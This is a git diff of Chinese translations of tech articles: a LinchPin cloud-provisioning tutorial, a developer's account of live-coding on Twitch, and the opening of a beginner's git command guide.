以前,有个名为 **linchpin_config.yml** 的文件。现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 **linchpin.conf**。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库的路径中。在多数情况下,**linchpin.conf** 文件是不需要去修改的。
|
||||
|
||||
### 工作空间
|
||||
|
||||
工作空间是一个定义的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单个点。它也可以是一个所有可管理资源的大的存储容器。
|
||||
|
||||
工作空间在命令行上使用 **--workspace (-w)** 选项去指定,随后是工作空间路径。它也可以使用环境变量(比如,bash 中的 **$WORKSPACE**)指定。默认工作空间是当前目录。
|
||||
|
||||
### 初始化 (init)
|
||||
|
||||
运行 **linchpin init** 将生成一个需要的目录结构,以及一个 **PinFile**、**topology**、和 **layout** 文件的示例:
|
||||
|
||||
```
|
||||
$ export WORKSPACE=/tmp/workspace
|
||||
$ linchpin init
|
||||
PinFile and file structure created at /tmp/workspace
|
||||
$ cd /tmp/workspace/
|
||||
$ tree
|
||||
.
|
||||
├── credentials
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── example-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── example-topology.yml
|
||||
```
|
||||
|
||||
在这个时候,一个可执行的 **linchpin up** 并且提供一个 **libvirt** 虚拟机,和一个名为 **linchpin-centos71** 的网络。一个库存(inventory)将被生成,并被放在 **inventories/libvirt.inventory** 目录中。它可以通过读取 **topologies/example-topology.yml** 和收集 **topology_name** 的值了解它。
|
||||
|
||||
### 做好准备 (linchpin up)
|
||||
|
||||
一旦有了一个 PinFile、拓扑、和一个可选的布局,它已经做好了准备。
|
||||
|
||||
我们使用 dummy 工具,因为用它去配置非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 提供创建一个临时文件,它表示配置的主机。如果临时文件没有任何数据,说明主机没有被配置,或者它已经被销毁了。
|
||||
|
||||
dummy 提供的树像这样:
|
||||
|
||||
```
|
||||
$ tree
|
||||
.
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── dummy-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── dummy-cluster.yml
|
||||
```
|
||||
|
||||
PinFile 也很简单;它指定了它的拓扑,并且可以为 **dummy1** 目标提供一个可选的布局:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
```
|
||||
|
||||
**dummy-cluster.yml** 拓扑文件是一个引用到提供的三个 **dummy_node** 类型的资源:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: "dummy_cluster" # topology name
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: "dummy"
|
||||
resource_group_type: "dummy"
|
||||
resource_definitions:
|
||||
-
|
||||
name: "web"
|
||||
type: "dummy_node"
|
||||
count: 3
|
||||
```
|
||||
|
||||
执行命令 **linchpin up** 将基于上面的 **topology_name**(在这个案例中是 **dummy_cluster**)生成 **resources** 和 **inventory** 文件。
|
||||
|
||||
```
|
||||
$ linchpin up
|
||||
target: dummy1, action: up
|
||||
|
||||
$ ls {resources,inventories}/dummy*
|
||||
inventories/dummy_cluster.inventory resources/dummy_cluster.output
|
||||
```
|
||||
|
||||
去验证 dummy 集群的资源,检查 **/tmp/dummy.hosts**:
|
||||
|
||||
```
|
||||
$ cat /tmp/dummy.hosts
|
||||
web-0.example.net
|
||||
web-1.example.net
|
||||
web-2.example.net
|
||||
```
|
||||
|
||||
Dummy 模块为假定的(或 dummy)供应提供了一个基本工具。OpenStack、AWS EC2、Google Cloud、和更多的关于 LinchPin 的详细情况,可以去看[示例][18]。
|
||||
|
||||
### 库存(Inventory)生成
|
||||
|
||||
作为上面提到的 PinFile 的一部分,可以指定一个 **layout**。如果这个文件被指定,并且放在一个正确的位置上,一个用于提供资源的 Ansible 的静态库存(inventory)文件将被自动生成:
|
||||
|
||||
```
|
||||
---
|
||||
inventory_layout:
|
||||
vars:
|
||||
hostname: __IP__
|
||||
hosts:
|
||||
example-node:
|
||||
count: 3
|
||||
host_groups:
|
||||
- example
|
||||
```
|
||||
|
||||
当 **linchpin up** 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存(inventory)的 IP 地址或主机名:
|
||||
|
||||
```
|
||||
[example]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
|
||||
[all]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
```
|
||||
|
||||
### 卸载 (linchpin destroy)
|
||||
|
||||
LinchPin 也可以执行一个资源卸载。一个卸载动作一般认为资源是已经配置好的;然而,因为 Ansible 是幂等的(idempotent),**linchpin destroy** 将仅去检查确认资源是启用的。如果这个资源已经是启用的,它将去卸载它。
|
||||
|
||||
命令 **linchpin destroy** 也将使用资源和/或拓扑文件去决定合适的卸载过程。
|
||||
|
||||
**dummy** Ansible 角色不使用资源,卸载期间仅有拓扑:
|
||||
|
||||
```
|
||||
$ linchpin destroy
|
||||
target: dummy1, action: destroy
|
||||
|
||||
$ cat /tmp/dummy.hosts
|
||||
-- EMPTY FILE --
|
||||
```
|
||||
|
||||
在暂时的资源上,卸载功能有一些限制,像网络、存储、等等。网络资源被用于多个云实例是可能的。在这种情况下,执行一个 **linchpin destroy** 不能卸载某些资源。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。
|
||||
|
||||
### LinchPin 的 Python API
|
||||
|
||||
在 **linchpin** 命令行中实现的功能大多数已经被写成了 Python API。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。
|
||||
|
||||
这个 API 由下面的三个包组成:
|
||||
|
||||
* **linchpin**
|
||||
|
||||
* **linchpin.cli**
|
||||
|
||||
* **linchpin.api**
|
||||
|
||||
这个命令行工具是基于 **linchpin** 包来管理的。它导入了 **linchpin.cli** 模块和类,它是 **linchpin.api** 的子类。它的目的是为了允许使用 **linchpin.api** 的 LinchPin 的可能的其它实现,比如像计划的 RESTful API。
|
||||
|
||||
更多信息,去查看 [Python API library documentation on Read the Docs][20]。
|
||||
|
||||
### Hooks
|
||||
|
||||
LinchPin 1.0 的其中一个大的变化是转向 hooks。hooks 的目标是在 **linchpin** 运行期间,允许配置使用外部资源。目前情况如下:
|
||||
|
||||
* **preup**: 在准备拓扑资源之前运行
|
||||
|
||||
* **postup**: 在准备拓扑资源之后运行,并且生成可选的库存(inventory)
|
||||
|
||||
* **predestroy**: 卸载拓扑资源之前运行
|
||||
|
||||
* **postdestroy**: 卸载拓扑资源之后运行
|
||||
|
||||
在每种情况下,这些 hooks 允许去运行外部脚本。存在几种类型的 hooks,包括一个定制的叫做 _Action Managers_。这是一个内置的动作管理的列表:
|
||||
|
||||
* **shell**: 允许任何的内联(inline)shell 命令,或者一个可运行的 shell 脚本
|
||||
|
||||
* **python**: 运行一个 Python 脚本
|
||||
|
||||
* **ansible**: 运行一个 Ansible playbook,允许通过一个 **vars_file** 和 **extra_vars** 表示为一个 Python 字典
|
||||
|
||||
* **nodejs**: 运行一个 Node.js 脚本
|
||||
|
||||
* **ruby**: 运行一个 Ruby 脚本
|
||||
|
||||
一个 hook 是绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hooks 将可能是全局的,然后它们在每个目标的 **hooks** 节更简单地进行命名。
|
||||
|
||||
### 使用 hooks
|
||||
|
||||
描述 hooks 是非常简单的,理解它们强大的功能却并不简单。这个特性的存在是为了给用户提供灵活的功能,而这些功能开发者可能并不会去考虑。对于实例,在运行其它的 hook 之前,这个概念可能会带来一个简单的方式去 ping 一套系统。
|
||||
|
||||
更仔细地去研究 _工作空间_ ,你可能会注意到 **hooks** 目录,让我们看一下这个目录的结构:
|
||||
|
||||
```
|
||||
$ tree hooks/
|
||||
hooks/
|
||||
├── ansible
|
||||
│ ├── ping
|
||||
│ │ └── dummy_ping.yaml
|
||||
└── shell
|
||||
└── database
|
||||
├── init_db.sh
|
||||
└── setup_db.sh
|
||||
```
|
||||
|
||||
在任何情况下,hooks 都可以在 **PinFile** 中使用,展示如下:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
hooks:
|
||||
postup:
|
||||
- name: ping
|
||||
type: ansible
|
||||
actions:
|
||||
- dummy_ping.yaml
|
||||
- name: database
|
||||
type: shell
|
||||
actions:
|
||||
- setup_db.sh
|
||||
- init_db.sh
|
||||
```
|
||||
|
||||
那是基本概念,这里有三个 postup 动作去完成。Hooks 是从上到下运行的,因此,Ansible **ping** 任务将首先运行,紧接着是两个 shell 任务, **setup_db.sh** 和 **init_db.sh**。假设 hooks 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。
|
||||
|
||||
### 认证的驱动程序
|
||||
|
||||
在 LinchPin 的最初设计中,开发者决定去在 Ansible playbooks 中管理认证;然而,移到更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。
|
||||
|
||||
### 配置
|
||||
|
||||
让用户使用驱动程序提供的认证方法去完成这个任务。对于实例,如果对于 OpenStack 调用的拓扑,标准方法是可以使用一个 yaml 文件,或者类似于 **OS_** 前缀的环境变量。一个 clouds.yaml 文件是一个 profile 文件的组成部分,它有一个 **auth** 节:
|
||||
|
||||
```
|
||||
clouds:
|
||||
default:
|
||||
auth:
|
||||
auth_url: http://stack.example.com:5000/v2.0/
|
||||
project_name: factory2
|
||||
username: factory-user
|
||||
password: password-is-not-a-good-password
|
||||
```
|
||||
|
||||
更多详细信息在 [OpenStack documentation][21]。
|
||||
|
||||
这个 clouds.yaml 或者在位于 **default_credentials_path** (比如,~/.config/linchpin)中和拓扑中引用的任何其它认证文件:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: openstack-test
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: linchpin
|
||||
resource_group_type: openstack
|
||||
resource_definitions:
|
||||
- name: resource
|
||||
type: os_server
|
||||
flavor: m1.small
|
||||
image: rhel-7.2-server-x86_64-released
|
||||
count: 1
|
||||
keypair: test-key
|
||||
networks:
|
||||
- test-net2
|
||||
fip_pool: 10.0.72.0/24
|
||||
credentials:
|
||||
filename: clouds.yaml
|
||||
profile: default
|
||||
```
|
||||
|
||||
**default_credentials_path** 可以通过修改 **linchpin.conf** 被改变。
|
||||
|
||||
拓扑在底部包含一个新的 **credentials** 节。使用 **openstack**、**ec2**、和 **gcloud** 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的 _名为_ **clouds.yaml** 的文件,并搜索名为 **default** 的 _配置_。
|
||||
|
||||
假设认证被找到并被加载,准备将正常继续。
|
||||
|
||||
### 简化
|
||||
|
||||
虽然 LinchPin 可以完成复杂的拓扑、库存布局、hooks、和认证管理,但是,终极目标是简化。通过使用一个命令行界面的简化,除了提升已经完成的 1.0 版的开发者体验外,LinchPin 将持续去展示复杂的配置可以很简单地去管理。
|
||||
|
||||
### 社区的成长
|
||||
|
||||
在过去的一年中,LinchPin 的社区现在已经有了 [邮件列表][22]和一个 IRC 频道(#linchpin on chat.freenode.net),而且在 [GitHub][23] 中我们很努力地管理它。
|
||||
|
||||
在过去的一年里,社区成员已经从 2 位核心开发者增加到大约 10 位贡献者。更多的人持续参与到项目中。如果你对 LinchPin 感兴趣,可以给我们写信、在 GitHub 上提问,加入 IRC,或者给我们发邮件。
|
||||
|
||||
_这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐湖城举行。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
Clint Savage - 工作于 Red Hat 是一位负责原子项目(Project Atomic)的高级软件工程师。他的工作是为 Fedora、CentOS、和 Red Hat Enterprise Linux(RHEL)提供自动原子服务器构建。
|
||||
|
||||
-------------
|
||||
|
||||
via: https://opensource.com/article/17/6/linchpin
|
||||
|
||||
作者:[Clint Savage][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/herlo
|
||||
[1]:https://opensource.com/resources/cloud?src=cloud_resource_menu1
|
||||
[2]:https://opensource.com/resources/what-is-openstack?src=cloud_resource_menu2
|
||||
[3]:https://opensource.com/resources/what-is-kubernetes?src=cloud_resource_menu3
|
||||
[4]:https://opensource.com/16/12/yearbook-why-operating-system-matters?src=cloud_resource_menu4
|
||||
[5]:https://opensource.com/business/16/10/interview-andy-cathrow-anchore?src=cloud_resource_menu5
|
||||
[6]:https://opensource.com/article/17/6/linchpin?rate=yx4feHOc5Kf9gaZe5S4MoVAmf9mgtociUimJKAYgwZs
|
||||
[7]:https://www.openwest.org/custom/description.php?id=166
|
||||
[8]:https://www.openwest.org/
|
||||
[9]:https://opensource.com/user/145261/feed
|
||||
[10]:https://www.flickr.com/photos/internetarchivebookimages/14587478927/in/photolist-oe2Gwy-otuvuy-otus3U-otuuh3-ovwtoH-oe2AXD-otutEw-ovwpd8-oe2Me9-ovf688-oxhaVa-oe2mNh-oe3AN6-ovuyL7-ovf9Kt-oe2m4G-ovwqsH-ovjfJY-ovjfrU-oe2rAU-otuuBw-oe3Dgn-oe2JHY-ovfcrF-oe2Ns1-ovjh2N-oe3AmK-otuwP7-ovwrHt-ovwmpH-ovf892-ovfbsr-ovuAzN-ovf3qp-ovuFcJ-oe2T3U-ovwn8r-oe2L3T-oe3ELr-oe2Dmr-ovuyB9-ovuA9s-otuvPG-oturHA-ovuDAh-ovwkV6-ovf5Yv-ovuCC5-ovfc2x-oxhf1V
|
||||
[11]:http://sexysexypenguins.com/posts/introducing-linch-pin/
|
||||
[12]:http://linch-pin.readthedocs.io/en/develop/
|
||||
[13]:https://opensource.com/resources/cloud
|
||||
[14]:http://click.pocoo.org/
|
||||
[15]:https://opensource.com/resources/python
|
||||
[16]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[17]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[18]:https://github.com/CentOS-PaaS-SIG/linchpin/tree/develop/linchpin/examples/topologies
|
||||
[19]:https://github.com/CentOS-PaaS-SIG/linch-pin/tree/develop/linchpin/provision/roles
|
||||
[20]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[21]:https://docs.openstack.org/developer/python-openstackclient/configuration.html
|
||||
[22]:https://www.redhat.com/mailman/listinfo/linchpin
|
||||
[23]:https://github.com/CentOS-PaaS-SIG/linch-pin/projects/4
|
||||
[24]:https://opensource.com/users/herlo
|
@ -0,0 +1,161 @@
|
||||
我在 Twitch 平台直播编程的第一年
|
||||
============================================================
|
||||
去年 7 月我进行了第一次直播。不像大多数人那样在 Twitch 上进行游戏直播,我想直播的内容是我利用个人时间进行的开源工作。我对 NodeJS 硬件库有一定的研究(其中大部分是靠我自学的)。考虑到我已经在 Twitch 上有了一个直播间,为什么不再建一个更小更专业的直播间,比如使用 <ruby>JavaScript 驱动硬件<rt>JavaScript powered hardware</rt></ruby> 来建立直播间 :) 我注册了 [我自己的频道][1] ,从那以后我就开始定期直播。
|
||||
|
||||
我当然不是第一个这么做的人。[Handmade Hero][2] 是我最早看到的几个在线直播编程的程序员之一。很快这种直播方式被 Vlambeer 发扬光大,他在 Twitch 的 [Nuclear Throne live][3] 直播间进行直播。我对 Vlambeer 尤其着迷。
|
||||
|
||||
我的朋友 [Nolan Lawson][4] 让我 _真正开始做_ 这件事,而不只是单纯地 _想要做_ 。我看了他 [在周末直播开源工作][5] ,做得棒极了。他解释了他当时做的每一件事。每一件事。回复 GitHub 上的 <ruby>问题<rt>issues</rt></ruby> ,鉴别 bug ,在 <ruby>分支<rt>branches</rt></ruby> 中调试程序,你知道的。这令我着迷,因为 Nolan 使他的开源库得到了广泛的使用。他的开源生活和我的完全不一样。
|
||||
|
||||
你甚至可以看到我在他视频下的评论:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png)
|
||||
|
||||
我大约在一周或更久之后建好了自己的 Twitch 频道,并摸清了 OBS 的使用方法,随后开始了自己的直播。我当时用的是 [Avrgirl-Arduino][6] ,现在我依然经常用它直播。第一次直播十分粗糙。我前一天晚上排练得很晚,但直播时我依然很紧张。
|
||||
|
||||
那个星期六我极少的几个听众给了我很大的鼓舞,因此我坚持了下去。现在我有了超过一千个听众,他们中的一些人形成了一个可爱的小团体,他们会定期观看我的直播,我称呼他们为 “noopkat 家庭” 。
|
||||
|
||||
我们很开心。我想称呼这个即时编程部分为“多玩家在线组队编程”。我真的被他们每个人的热情和才能触动了。一次,一个团体成员指出我的 Arduino 开发板没有连接上软件,因为板子上的芯片丢了。这真是最有趣的时刻之一。
|
||||
|
||||
我经常暂停直播,检查我的收件箱,看看有没有人对我提过的,不再有时间完成的工作发起 <ruby>拉取请求<rt>pull request</rt></ruby> 。感谢我 Twitch 社区对我的帮助和鼓励。
|
||||
|
||||
我很想聊聊 Twitch 直播给我带来的好处,但它的内容太多了,我应该会在我下一个博客里介绍。我在这里想要分享的,是我学习的关于如何自己实现直播编程的课程。最近几个开发者问我怎么开始自己的直播,因此我在这里想大家展示我给他们的建议!
|
||||
|
||||
首先,我在这里贴出一个给过我很大帮助的教程 [“Streaming and Finding Success on Twitch”][7] 。它专注于 Twitch 与游戏直播,但也有很多和我们要做的东西相关的部分。我建议首先阅读这个教程,然后再考虑一些建立直播频道的细节(比如如何选择设备和软件)。
|
||||
|
||||
下面我列出我自己的配置。这些配置是从我多次的错误经验中总结出来的,其中要感谢我的直播同行的智慧与建议(对,你们知道就是你们!)。
|
||||
|
||||
### 软件
|
||||
|
||||
有很多免费的直播软件。我用的是 [Open Broadcaster Software (OBS)][8] 。它适用于大多数的平台。我觉得它十分直观且易于入门,但掌握其他的进阶功能则需要一段时间的学习。学好它你会获得很多好处!这是今天我直播时 OBS 的桌面截图(点击查看大图):
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png)
|
||||
|
||||
你直播时需要在不用的“场景”中进行切换。一个“场景”是多个“素材”通过堆叠和组合产生的集合。一个“素材”可以是照相机,麦克风,你的桌面,网页,动态文本,图片等等。 OBS 是一个很强大的软件。
|
||||
|
||||
最上方的桌面场景是我编程的环境,我直播的时候主要停留在这里。我使用 iTerm 和 vim ,同时打开一个可以切换的浏览器窗口来查阅文献或在 GitHub 上分类检索资料。
|
||||
|
||||
底部的黑色长方形是我的网络摄像头,人们可以通过这种个人化的连接方式来观看我工作。
|
||||
|
||||
我的场景中有一些“标签”,很多都与状态或者顶栏信息有关。顶栏只是添加了个性化信息,它在直播时是一个很好的连续性素材。这是我在 [GIMP][9] 里制作的图片,在你的场景里它会作为一个素材来加载。一些标签是从文本文件里添加的动态内容(例如最新粉丝)。另一个标签是一个 [custom one I made][10] ,它可以展示我直播的房间的动态温度与湿度。
|
||||
|
||||
我还在我的场景里设置了“闹钟”,当有人粉了我或者给了打赏,它会显示在最前方。我使用 [Stream Labs][11] 网络服务来实现它,将它作为一个浏览器网页素材引进我的场景。 Stream Labs 也会在顶栏里给出我最新粉丝的动态信息。
|
||||
|
||||
我直播的时候,也会使用一个备用场景:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png)
|
||||
|
||||
当我输入密码和 API keys 的时候,我另外需要一个场景。它会在网络摄像头里展示我,但是将我的桌面用一个娱乐页面隐藏起来,这样我可以做一些私密的工作:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png)
|
||||
|
||||
正如你看到的,我直播的时候没有把窗口填的太满,但我让我的观众尽可能多地看到我的内容。
|
||||
|
||||
但现在有一个现实的秘密:我使用 OBS 来安排我屏幕的底部和右侧,同时视频保持了 Twitch 要求的长宽比。这让我有了空间在底部查看我的事件(订阅数等),同时在右侧观看和回复我的频道聊天室。 Twitch 允许新窗口“弹出”聊天室,这很有用。
|
||||
|
||||
这是我完整的桌面看起来的样子:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png)
|
||||
|
||||
我几个月前开始做这个,还没有回顾过。我甚至不确定我的观众们有没有意识到我进行的这些精心的设置。我想他们可能会把“我可以看到每个东西”视作理所应当,而事实上我常常忙于敲代码,而看不到正在直播的东西!
|
||||
|
||||
你可能想知道为什么我只用一个显示器。这是因为两个显示器在我直播的时候太难以管理了。我很快意识到这一点,并且恢复了单屏。
|
||||
|
||||
### 硬件
|
||||
|
||||
我从使用便宜的器材开始,当我意识到我会长期坚持直播之后,才将他们逐渐换成更好的。开始的时候尽量使用你现有的器材,即使是只用电脑内置的摄像头与麦克风。
|
||||
|
||||
现在我使用 Logitech Pro C920 网络摄像头,和一个固定有支架的 Blue Yeti 麦克风。花费是值得的。我直播的质量完全不同了。
|
||||
|
||||
我使用大屏显示器(27"),因为我之前说的,使用两个屏幕对我来说不方便。我常常错过聊天,因为我经常不检查我的第二屏幕。你可能觉得使用两个屏幕很方便,但对我来说,把所有东西放在一个屏幕上有利于我对所有事情保持注意力。
|
||||
|
||||
这基本上就是硬件部分的大部分内容了。我没有使用复杂的设置。
|
||||
|
||||
如果你感兴趣,我的桌面看起来不错,除了刺眼的麦克风:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg)
|
||||
|
||||
### 建议
|
||||
|
||||
最后这里有一些我通过实践得出的一般性建议,这使我的直播从整体来看变得更好,更有趣。
|
||||
|
||||
#### 布告板
|
||||
|
||||
花点时间建立一个好的布告版。布告板是位于每个人频道底部的小内容框。我把它们看作新的个人空间窗口(真的)。理想的布告板可以有类似于聊天规则,有关直播内容的信息,你使用的电脑和设备,你最喜欢的猫的种类,等等这样的东西。任何关于个人形象的内容都可以。我们可以看看其他人(尤其是热播播主)的理想的布告板是什么样的!
|
||||
|
||||
一个我的布告板的例子:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png)
|
||||
|
||||
#### 聊天
|
||||
|
||||
聊天真的很重要。你可能会被中途观看你直播的人一遍又一遍地问同样的问题,如果可以像现实生活中那样聊天那样会很方便。“你正在做什么?”是我敲代码的时候别人最常问我的问题。我用 [Nightbot][12] 设置了一个聊天快捷命令。当你输入一些像 _whatamidoing_(我正在做什么) 这样的单词时,会自动给出我事先设好的解释。
|
||||
|
||||
当人们问问题或者给出一些有趣的评论时,要回复他们!和他们说谢谢,说他们的 Twitch 用的很好,他们会感谢你的关心和认可。一开始的时候很难对这些都保持注意力,但你做得多了之后,你会发现同时做这几件事变得更容易了。尝试着每两分钟就花几秒去关注聊天室。
|
||||
|
||||
当你编程的时候,_解释你正在做的事_ 。多说点。开开玩笑。即使我碰到了麻烦,我也会说:“哦,糟糕,我忘了这个方法怎么用了,我 Google 一下看看”。人们一般都很友好,有时他们还会和你一起寻找解决的办法。这很有趣,让人们一直看着你。
|
||||
|
||||
如果播主一直安静地坐在那敲代码,不去聊天,也不管他新粉丝的信息,我会很快对他失去兴趣。
|
||||
|
||||
很可能你 99% 的观众都很友好,并且都有好奇心。我偶尔还是会碰到挑衅的人,但 Twitch 提供的检查工具可以有效避免这种情况。
|
||||
|
||||
#### 准备时间
|
||||
|
||||
尽量将你的配置“自动化”。我的终端是 iTerm ,它可以让你保存窗口排列和字体大小的配置,这样你以后就可以再现这些配置。我有一个直播时的配置和一个不直播时的配置,这非常省事。我输入一个命令,所有东西就都在合适的位置并保持最完美的尺寸,并可以使用了。
|
||||
|
||||
还有其他的应用可以用来自动化你的窗口位置,看看有没有对你有用的。
|
||||
|
||||
让你的字体在终端和编辑器中尽可能的大,这样所有人都能看清。
|
||||
|
||||
#### 定期直播
|
||||
|
||||
让你的日程表更有规律。我一周只直播一次,但总是在同一时间。如果你临时有事不能在你平常直播的时间直播,要让人们知道。这让我保持了一些固定观众。一些人喜欢固定的时间,这就像和朋友在一起一样。你和你的社区在一个社交圈子里,所以要像对待朋友一样对待他们。
|
||||
|
||||
我想要提高我更新直播的频率,但我知道因为旅游的缘故我不能适应超过一周一次的直播频率。我正在尝试找到一种可以让我在路上也能高质量地直播的方法。或许可以临时将我聊天和写代码的过程保存起来,周末直播的时候再放出来。我仍然在探索这些办法!
|
||||
|
||||
#### 紧张心理
|
||||
|
||||
当你即将开始的时候,你会感觉很奇怪,不适应。你会在人们看着你写代码的时候感到紧张。这很正常!尽管我之前有过公共演说的经历,我一开始的时候还是感到陌生而不适应。我感觉我无处可藏,这令我害怕。我想:“大家可能都觉得我的代码很糟糕,我是一个糟糕的开发者。”这是一个困扰了我 _整个职业生涯_ 的想法,对我来说不新鲜了。我知道带着这些想法,我不能在发布到 GitHub 之前仔细地再检查一遍代码,而这样做更有利于我保持我作为开发者的声誉。
|
||||
|
||||
我从 Twitch 直播中发现了很多关于我代码风格的东西。我知道我的风格绝对是“先让它跑起来,然后再考虑可读性,然后再考虑运行速度”。我不再在前一天晚上提前排练好直播的内容(一开始的三四次直播我都是这么做的),所以我在 Twitch 上写的代码是相当粗糙的,我还得保证它们运行起来没问题。当我不看别人的聊天和讨论的时候,我可以写出我最好的代码,这样是没问题的。但我总会忘记我使用过无数遍的方法的名字,而且每次直播的时候都会犯“愚蠢的”错误。一般来说,这不是一个让你能达到你最好状态的生产环境。
|
||||
|
||||
我的 Twitch 社区从来不会因为这个苛求我,反而是他们帮了我很多。他们理解我正同时做着几件事,而且真的给了很多务实的意见和建议。有时是他们帮我找到了解决方法,有时是我要向他们解释为什么他们的建议不适合解决这个问题。这真的很像一般意义的组队编程!
|
||||
|
||||
我想这种“不管重要不重要,什么都说”的情况对于直播这种媒介来说是一种优势,而不是劣势。它让我想的更多。理解一个观念很重要,那就是没有完美的程序员,也没有完美的代码。对于一个新手程序员来说这是令人耳目一新的经历,对我这个老手来说却是微不足道的。
|
||||
|
||||
### 总结
|
||||
|
||||
如果你想过在 Twitch 上直播,我希望你试一下!如果你想知道怎么迈出第一步,我希望这篇博客可以帮的到你。
|
||||
|
||||
如果你周日想要加入我的直播,你可以 [订阅我的 Twitch 频道][13] :)
|
||||
|
||||
最后我想说一下,我个人十分感谢 [Mattias Johansson][14] 在我早期开始直播的时候给我的建议和鼓励。他的 [FunFunFunction YouTube channel][15] 也是一个令人激动的定期直播频道。
|
||||
|
||||
另:许多人问过我的键盘和其他工作设备是什么样的, [这是我使用的器材的完整列表][16] 。感谢关注!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1
|
||||
|
||||
作者:[ Suz Hinton][a]
|
||||
译者:[lonaparte](https://github.com/lonaparte)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.freecodecamp.org/@suzhinton
|
||||
[1]:https://www.twitch.tv/noopkat
|
||||
[2]:https://www.twitch.tv/handmade_hero
|
||||
[3]:http://nuclearthrone.com/twitch/
|
||||
[4]:https://twitter.com/nolanlawson
|
||||
[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ
|
||||
[6]:https://github.com/noopkat/avrgirl-arduino
|
||||
[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/
|
||||
[8]:https://obsproject.com/
|
||||
[9]:https://www.gimp.org/
|
||||
[10]:https://github.com/noopkat/study-temp
|
||||
[11]:https://streamlabs.com/
|
||||
[12]:https://beta.nightbot.tv/
|
||||
[13]:https://www.twitch.tv/noopkat
|
||||
[14]:https://twitter.com/mpjme
|
||||
[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q
|
||||
[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8
|
@ -0,0 +1,170 @@
|
||||
GIT 命令"从初学到专业"完整进阶指南
|
||||
===========
|
||||
|
||||
在[之前的教程][1]中,我们已经学习了在机器上安装 git。本教程,我们将讨论如何使用 git,比如与 git 一起使用的各种命令。所以我们开始吧,
|
||||
(**推荐阅读:[如何在 Linux 上安装 GIT (Ubuntu 和 CentOS)][1]**)
|
||||
### 设置用户信息
|
||||
这应该是安装完 git 的第一步。我们将添加用户信息 (用户名和邮箱),所以当我们提交代码时,会产生带有用户信息的提交信息,这使得跟踪提交过程变得更容易。为了添加用户信息,命令是 `git config`,
|
||||
```
|
||||
$ git config --global user.name "Daniel"
|
||||
$ git config --global user.email "dan.mike@xyz.com"
|
||||
```
|
||||
添加完用户信息之后,通过运行下面命令,我们将检查这些信息是否成功更新,
|
||||
```
|
||||
$ git config --list
|
||||
```
|
||||
并且我们应该能够看到输出的用户信息。
|
||||
(**我们也应该读一下:[使用 CRONTAB 来安排重要的工作][3]**)
|
||||
### GIT 命令
|
||||
#### 新建一个仓库
|
||||
为了建立一个新仓库,运行如下命令,
|
||||
```
|
||||
$ git init
|
||||
```
|
||||
#### 查找一个仓库
|
||||
为了查找一个仓库,命令如下,
|
||||
```
|
||||
$ git grep "repository"
|
||||
```
|
||||
